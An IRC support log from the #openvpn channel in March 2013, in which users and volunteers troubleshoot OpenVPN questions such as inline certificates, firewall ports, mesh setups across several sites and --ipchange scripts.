OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 11:33 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer] 11:34 < MoPac> I guess I'm a little confused re: the inline certs -- my idea here is that the keys would only be accessible to a user who had entered a password to mount the encfs folder 11:36 < MoPac> pekster: Sorry I missed your message earlier. The network manager status indicator wasn't very forthcoming about the reason for the failure, just that the connection "failed" 11:36 < MoPac> Through trial and error, I determined that the problem was the folder that the cert/key files were in 11:37 < MoPac> Alternately, is there a way to encrypt the client keys in place and have OpenVPN prompt for a password to decrypt them at connect time? 11:38 <@krzee> !factoids search pass 11:38 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password' 11:38 <@krzee> !change-passphrase 11:38 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase 11:38 <@krzee> MoPac, ^^ 11:38 < MoPac> Ahh, thanks. N00b to openvpn, just trying to finally ditch pptp 11:39 <@krzee> np, good choice 11:40 <@krzee> MoPac, i suggested inline certs cause you could put the entire config in the encrypted dir 11:40 <@krzee> and then whatever is messing things up (dir not being mounted or something) wont even be able to read the config if it cant read the keys 11:41 < MoPac> krzee: I see. That wasn't as intuitive to me because my config is being build by the Ubuntu network manager GUI 11:42 <@krzee> we strongly recommend against that 11:42 <@krzee> !ubuntu 11:42 <@vpnHelper> "ubuntu" is dont use network manager! 11:42 <@krzee> !netman 11:42 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 11:42 < MoPac> Good to know 11:43 <@krzee> if you want to import a working config to netman after, go for it 11:43 -!- failshell [~failshell@lpr157.lapresse.ca] has quit [Remote host closed the connection] 11:43 <@krzee> but dont start by making your configs with netman 11:43 < MoPac> Is it a security issue, or just a lack of features? 11:43 <@krzee> its a "you wont know why shit doesnt work how you said for it to" 11:44 < MoPac> QED in my case 11:44 -!- JSharpe [~JSharpe@176.227.206.250] has joined #openvpn 11:44 < MoPac> Any other decent GUI out there to build a proper config, or am I going to need to read a manpage and learn the lines? 11:45 <@krzee> !confgen 11:45 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 11:45 <@krzee> could use that if you want 11:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:45 < MoPac> thanks! 11:45 <@krzee> it may not be exactly what you want, but it'll give you something to start from 11:46 -!- Isenn [~Isenn@linux.linuxtalk.sizeit.se] has joined #openvpn 11:46 -!- Isenn [~Isenn@linux.linuxtalk.sizeit.se] has left #openvpn [] 11:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:12 -!- cosmicfires [~el-brujo@c-50-135-29-248.hsd1.wa.comcast.net] has quit [Quit: bye...] 12:16 -!- master_of_master [~master_of@p4FF242AF.dip.t-dialin.net] has joined #openvpn 12:19 -!- master_o1_master [~master_of@p4FF24C7A.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 12:20 -!- MoPac [~MoPac@unaffiliated/mopac] has quit [] 12:35 -!- dazo is now known as dazo_afk 12:40 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 12:43 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 12:44 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:44 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:44 -!- mode/#openvpn [+o krzee] by ChanServ 12:49 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 272 seconds] 12:57 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 12:59 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 13:07 -!- krphop_ is now known as krphop 13:14 <@krzee> !learn googleauth as http://securityskittles.wordpress.com/2012/03/14/two-factor-authentication-for-openvpn-on-centos-using-google-authenticator/ 13:14 <@vpnHelper> Joo got it. 13:17 < MorgyN> ooh 13:17 < MorgyN> ooooh 13:17 < MorgyN> oooohhhhhhh 13:17 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:18 < MorgyN> ill stopnow but this is veryrelevant to my interests 13:18 < pekster> There are public and/or copyleft implementations of google auth in dozens of popular languages, so it should be fairly trivial to plug that into openvpn in whatever way works best for a particular shop 13:19 < pekster> Everything from python to java, although you probably don't really want to call java to do your 2-factor auth from openvpn ;) 13:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:32 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:35 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:38 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 13:39 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 264 seconds] 13:44 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 13:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 13:52 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 14:11 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 14:18 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 14:19 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 14:20 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 14:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:23 -!- mode/#openvpn [+v s7r] by ChanServ 14:26 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 14:42 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 14:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:55 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:56 -!- kyrix [~ashley@85.126.76.82] has quit [Ping timeout: 245 seconds] 14:57 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 15:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:00 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:01 -!- JSharpe [~JSharpe@176.227.206.250] has quit [Quit: Leaving] 15:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 15:05 -!- JSharpe [~JSharpe@5.152.198.170] has joined #openvpn 15:08 -!- Sanguines [~anon@c-67-165-169-36.hsd1.il.comcast.net] has joined #openvpn 15:08 -!- eHAPPY [~V1CE@ip174-73-2-35.no.no.cox.net] has joined #openvpn 15:09 -!- Orbi [~opera@109.129.0.27] has joined #openvpn 15:09 < eHAPPY> I just installed the openvpn access server for my esxi server and when i try to login through the webclient i get a "not authorized" message 15:10 < eHAPPY> any idea why or what i need to do? 15:10 < pekster> !as 15:10 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:11 < pekster> This channel is for the GPL OpenVPN project, not the commercial Access Service product 15:11 < eHAPPY> ah ok, ty 15:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:13 -!- eHAPPY [~V1CE@ip174-73-2-35.no.no.cox.net] has left #openvpn [] 15:15 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn 15:15 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:17 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 15:22 -!- JSharpe [~JSharpe@5.152.198.170] has quit [Read error: Connection reset by peer] 15:29 < Sanguines> is "iptables -I INPUT -p tcp --dport 1194 -j ACCEPT" sufficient to open the port in Debian? The server appears to be running, but I cannot access it. 15:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:31 < pppingme> Sanguines you running openvpn with tcp or more likely udp? 15:31 < Sanguines> Would that be on UDP? That would explain it 15:32 -!- JSharpe [~JSharpe@185.2.137.212] has joined #openvpn 15:32 < pppingme> openvpn is typically setup to use udp 15:33 < Sanguines> Well I'm getting a different error than before, that certainly seems to have done something =) w00t. I no nothing :P 15:45 -!- Valcorb [~Valcorb@d54c68bc0.access.telenet.be] has joined #openvpn 15:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:49 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 15:56 < rob0> -I, as you know from the iptables(8) man page, inserts the rule at the beginning of the chain. But we don't know what other rules you might have, so there is no sure answer. There are numerous ways I can think of wherein your -I rule would not work. 15:56 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has joined #openvpn 16:09 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 16:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 16:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 16:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:25 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:25 -!- JSharpe [~JSharpe@185.2.137.212] has quit [Quit: Leaving] 16:43 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 17:00 -!- Sanguines [~anon@c-67-165-169-36.hsd1.il.comcast.net] has quit [] 17:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 17:05 <@krzee> rob0, man whats? 17:05 <@krzee> what are these man pages you speak of 17:06 -!- zbychuk [~zbychuk@77-253-243-181.adsl.inetia.pl] has joined #openvpn 17:08 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 17:08 < rob0> The reference documents that people who ask questions in IRC should, but rarely do, consult first. 17:09 < zbychuk> !welcome 17:09 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 17:09 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 17:10 < zbychuk> !howto 17:10 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 17:10 < zbychuk> !route 17:10 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 17:10 <@vpnHelper> behind the server or client 17:10 < zbychuk> !redirect 17:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:10 <@vpnHelper> http://ircpimps.org/redirect.png 17:11 -!- zbychuk [~zbychuk@77-253-243-181.adsl.inetia.pl] has left #openvpn ["WeeChat 0.3.8"] 17:13 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 255 seconds] 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 17:19 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:23 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 17:23 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 17:26 < zoredache> does the community edition of openvpn support the ... ... ... syntax in the configuration file? 17:29 -!- Falteckz [~Falteckz@121.99.31.205] has joined #openvpn 17:29 < Falteckz> G'Day 17:29 < Falteckz> Multiple clients on an OpenVPN Network 17:29 < Falteckz> Do they connect directly if possible? 17:29 < zoredache> no 17:30 < Falteckz> All traffic is via the server? 17:30 < zoredache> yup. 17:30 < Falteckz> So adding 'redundency' with multiple servers wont do that at all 17:30 < Falteckz> It's just more servers that still can't talk to other clients. 17:30 < zoredache> I am sure I saw someone mention a mesh here a while back. 17:30 < Falteckz> I'm trying to setup a mesh network between multiple sites 17:30 < Falteckz> Was hoping OpenVPN could do it. 17:30 < zoredache> !mesh 17:30 < rob0> !inline 17:30 <@vpnHelper> "mesh" is (#1) openvpn does not do mesh networking or (#2) see !rip or (#3) check out http://github.com/darkpixel/openmesher/ for auto-creating openvpn meshes 17:30 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 17:31 < zoredache> rob0: thanks :) 17:31 < rob0> A mesh can be done "simply" by having direct tunnels from each site to each other site. Obviously that does not scale well beyond a few sites. 17:32 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 17:33 < Falteckz> If a server was to go down at one site, but not the internet connection. That entire site is still out of luck if it wants to get on the VPN? 17:33 < Falteckz> Without going in and changing the server address to a remote one 17:33 < rob0> You can't use the VPN if openvpn is not running or not connected. 17:35 -!- Orbi [~opera@109.129.0.27] has quit [Ping timeout: 256 seconds] 17:35 < Falteckz> The main thing I'm desiring is that Client A can connect to Server A, and Client B to Server B, but if Client A and Client B wish to talk to each other. They don't have to C.A->S.A->S.B->C.B 17:35 < Falteckz> They can connect directly 17:35 < Falteckz> It doen't work that way, correct? 17:35 < Falteckz> *doesn't. 17:36 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 17:36 < rob0> You can set up as many instances of openvpn as you and your systems can handle. That's more or less what I said above, about how to do a mesh. 17:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:37 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 17:37 -!- marksaitis_ [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:38 < Falteckz> Okay. 17:38 < Falteckz> But does that mean I require more than one instance per machine? 17:38 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Client Quit] 17:38 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Disconnected by services] 17:38 -!- marksaitis_ [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 17:39 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:39 < rob0> I don't know what you require. But if you want to do a mesh among three sites, you require two instances per site. For four sites, three per site. For X sites, X-1 instances per site. 17:39 < rob0> The most I have done was seven sites, six tunnels per site. 17:40 < zoredache> or you need a different VPN tool that has a full-mesh setup. 17:40 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 17:40 < rob0> sure. They're talking about that for the future. 17:40 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:42 < rob0> I guess it could be done by signalling a pair of clients to connect to one another on a specified port. 17:43 < zoredache> I recall the package I was thinking about. I was reading about [tinc](http://www.tinc-vpn.org/) a while back and it supposedly creates a full mesh. 17:43 <@vpnHelper> Title: tinc wiki (at www.tinc-vpn.org) 17:43 < rob0> I mean: when ClientA tells the server it wants to get to ClientB, the server tells each one the real IP address of the other, and a port for each to use. 17:44 < rob0> (and maybe they'd negotiate their own session key, I'm not sure how the crypto would work) 17:46 < Falteckz> Yeah, I mean the crypto wouldn't matter 17:46 < Falteckz> All they would need is the two addresses and the two port numbers 17:46 < Falteckz> ( Both source and dest ports really, for Nat punching ) 17:47 < Falteckz> * Crypto wouldn't matter in the context that it's irrelevant how it works so long as it does so. 17:47 < rob0> hmmm, tinc looks interesting, but where they talk about "why tinc?" they only mention "why not FreeS/WAN?" 17:51 < zoredache> Well tinc is one of the few tools with an full mesh mode, aside from IPSEC, which exists eveywhere, but is ugly to setup. 17:52 < zoredache> Plus the full mesh bits of IPsec are basically impossible if you have NAT at all. 17:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:55 < rob0> I don't think full mesh in openvpn would be very difficult to implement, but of course it wouldn't get through every NAT. 18:02 < zoredache> rob0: did you use routing or bridging for that 7 site mesh? I am trying to figure out how you handled the routing for that. 18:19 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 18:20 < rob0> I don't use bridging for anything. Each tunnel set up a route to each LAN behind each peer. 18:20 < rob0> we used /20's IIRC 18:21 < zoredache> so if the direct link between two systems failed, did you also have other routes if an indirect path was possible? 18:23 < rob0> well, we talked about that, but the customer figured if the site server was down, the site was down. 18:24 < rob0> more trouble to set that up than it would be worth 18:25 < zoredache> ah. It is the full mesh VPN with routing such that any path could be used that is giving me a headache. 18:26 < zoredache> If you had bridged your interface I would guess you could use OSPF/RIP/etc. 18:26 < zoredache> Or is it possible to get a routing protocol to actually work corectly in a routed openvpn config, I wonder.. 18:27 < kisom> im drunk, lol 18:40 -!- pulz [geir@winning.no] has joined #openvpn 18:42 < pulz> is a client supposed to be able to access its own lan when its connected to a ovpn server ? 18:42 < EugeneKay> Usually yes 18:43 < pulz> define usually 18:43 < EugeneKay> Depends how you set up your vpn configuration 18:43 < pulz> any points as to what settings are related to this ? 18:43 < EugeneKay> Typical use cases are to grant access to a remote LAN or redirect all internet-bound traffic through the server 18:43 < EugeneKay> Read the howto 18:44 < zoredache> pulz: It is almost always about routing. 18:47 < pulz> zoredache: figured as much, will have to look into it i gues 18:54 < rob0> zoredache, I am pretty sure it could be done, maybe with a routing daemon, but unfortunately I didn't get to take it that far. 18:54 < rob0> would have been fun! 18:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 19:02 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 19:03 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:03 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:03 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:03 -!- mode/#openvpn [+o krzee] by ChanServ 19:05 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 248 seconds] 19:08 -!- Valcorb [~Valcorb@d54c68bc0.access.telenet.be] has quit [] 19:10 -!- raidz is now known as raidz_away 19:20 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Remote host closed the connection] 19:56 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 272 seconds] 20:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:41 -!- hotwings [hd@secksy.net] has joined #openvpn 20:42 < hotwings> i want to use --ipchange to update dyndns whenever my ip changes, but how would i use it if i need to send an arg with the shell command? --ipchange "shellcmd myarg" ? 20:49 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 244 seconds] 21:02 <@krzee> !script 21:02 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 21:02 <@krzee> what sort of arg would you need? 21:02 <@krzee> everything you need should be variables already 21:31 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 21:43 < hotwings> that doesnt make any sense at all.. why would my scripts args being stored in variables? 21:43 < hotwings> *be 21:44 < EugeneKay> You don't get any args to your script 21:44 < EugeneKay> You need to read the env variables, which are listed in the man page 21:45 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 21:46 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:47 < hotwings> thats interesting since the "--ipchange" section at http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html says, 21:47 <@vpnHelper> Title: OpenVPN 2.1 (at openvpn.net) 21:47 -!- p3rror [~mezgani@41.250.238.203] has quit [Ping timeout: 245 seconds] 21:47 < hotwings> "Note that cmd can be a shell command with multiple arguments, in which case all OpenVPN-generated arguments will be appended to cmd to build a command line which will be passed to the script. " 21:49 < EugeneKay> I've not used that command, so I'm not familiar with the exact syntax 21:49 < hotwings> you can easily pass args to your own scripts when using --ipchange; --ipchange "yourscript yourarg1 yourarg2 yourarg3 etc" 21:49 < EugeneKay> My reading of the man page says that you can do `--ipchange Foo Bar`, but if you know those args ahead of time, that info oughta be coded into the script 21:49 < hotwings> i didnt realize you had to --script-security 2 or higher though. thats why it wasnt working 21:50 < EugeneKay> You also get ip_address and port_number as args 21:50 < EugeneKay> Any info past that has to be gleaned from env vars 21:50 < hotwings> EugeneKay - thats fine if the script only performs one task. but maintenance scripts tend to use args as a way for the user to tell the script what he wants it to do 21:52 < hotwings> for example: script [start|stop|restart] [some process or function supported by the script] 22:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 22:17 -!- vistas [~vistas@c-71-204-33-119.hsd1.ga.comcast.net] has joined #openvpn 22:18 < vistas> Where can I access logs for the client on Windows 7? It just hands on "Obtaining Configuration". 22:22 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 22:29 < vistas> SESSION_ID: OpenVPNClientSet: submit_creds session ID 22:29 < vistas> It's like IPSec is easier than this. 22:29 < vistas> Well, I never set it up myself. But :( 22:30 -!- hotwings [hd@secksy.net] has left #openvpn [] 22:41 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 22:43 -!- speed_racer8 [~speed_rac@98.196.168.201] has joined #openvpn 22:49 < vistas> Well I didn't figure it out because of logfiles, but because I saw that the TAP interface was disabled. 22:49 < vistas> Thanks. 22:55 -!- Matir [~matir@ubuntu/member/matir] has quit [Ping timeout: 255 seconds] 23:03 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 23:39 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 23:41 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn 23:49 -!- md_5 [~md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 23:51 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn --- Day changed Sat Mar 02 2013 00:00 -!- brute11k [~brute@89.249.231.52] has joined #openvpn 00:13 -!- Falteckz [~Falteckz@121.99.31.205] has quit [Ping timeout: 272 seconds] 01:22 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 01:28 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 01:28 -!- aaaar0n is now known as ar0nic 02:05 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 02:11 -!- xbanux [~xbanux@triband-mum-59.182.177.27.mtnl.net.in] has joined #openvpn 02:11 -!- Orbi [~opera@109.129.22.206] has joined #openvpn 02:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 02:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 02:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 02:58 -!- brute11k [~brute@89.249.231.52] has quit [Quit: Leaving.] 03:15 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 03:17 -!- Sevet [steveayre@149.241.69.221] has joined #openvpn 03:19 < Sevet> hi, does anyone know why my udp openvpn connections would constantly keep reconnecting? 03:19 < Sevet> i see 'Inactivity timeout (--ping-restart), restarting' in the server and clients logs, despite using 'keepalive 5 30' on the server 03:20 < Sevet> (2.1.3 server, 2.1.4 client) 03:28 < Sevet> from a packet trace on the client it appears that it's receiving ping packets from the server but never sending any 03:29 < Sevet> should the ping packets get a reply? 03:32 < Sevet> ok i have found my answer, i had push-reset in the ccd and it seems that was preventing the ping/ping-restart being pushed to the client 03:52 -!- Sevet [steveayre@149.241.69.221] has quit [] 04:13 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 04:13 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 04:13 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 04:13 -!- mode/#openvpn [+o krzee] by ChanServ 04:17 -!- krphop [~krphop@74.82.160.100] has quit [Ping timeout: 245 seconds] 04:20 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 04:23 -!- xbanux [~xbanux@triband-mum-59.182.177.27.mtnl.net.in] has quit [Read error: Connection reset by peer] 04:23 -!- xbanux [~xbanux@triband-mum-59.182.177.192.mtnl.net.in] has joined #openvpn 04:26 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 04:39 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in] 04:44 -!- p3rror [~mezgani@41.249.135.33] has joined #openvpn 04:45 -!- JSharpe [~JSharpe@146.185.24.18] has joined #openvpn 05:10 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:45 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 05:45 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 05:45 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 05:45 -!- mode/#openvpn [+o krzee] by ChanServ 05:47 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 05:49 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 05:50 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 05:51 -!- p3rror [~mezgani@41.249.135.33] has quit [Read error: Operation timed out] 05:56 -!- p3rror [~mezgani@41.249.135.33] has joined #openvpn 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:41 -!- dli_ [~dli@dsl-69-171-139-151.acanac.net] has joined #openvpn 08:22 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 264 seconds] 08:35 -!- p3rror [~mezgani@41.249.135.33] has quit [Read error: Connection reset by peer] 08:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:49 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 08:54 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 08:56 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 08:58 < neilhwatson> In bridged mode should the server have a route to know how to find the client's Openvpn assigned IP address? 09:01 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 09:02 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 09:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:13 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 09:15 -!- digilink [~digilink@unaffiliated/digilink] has joined 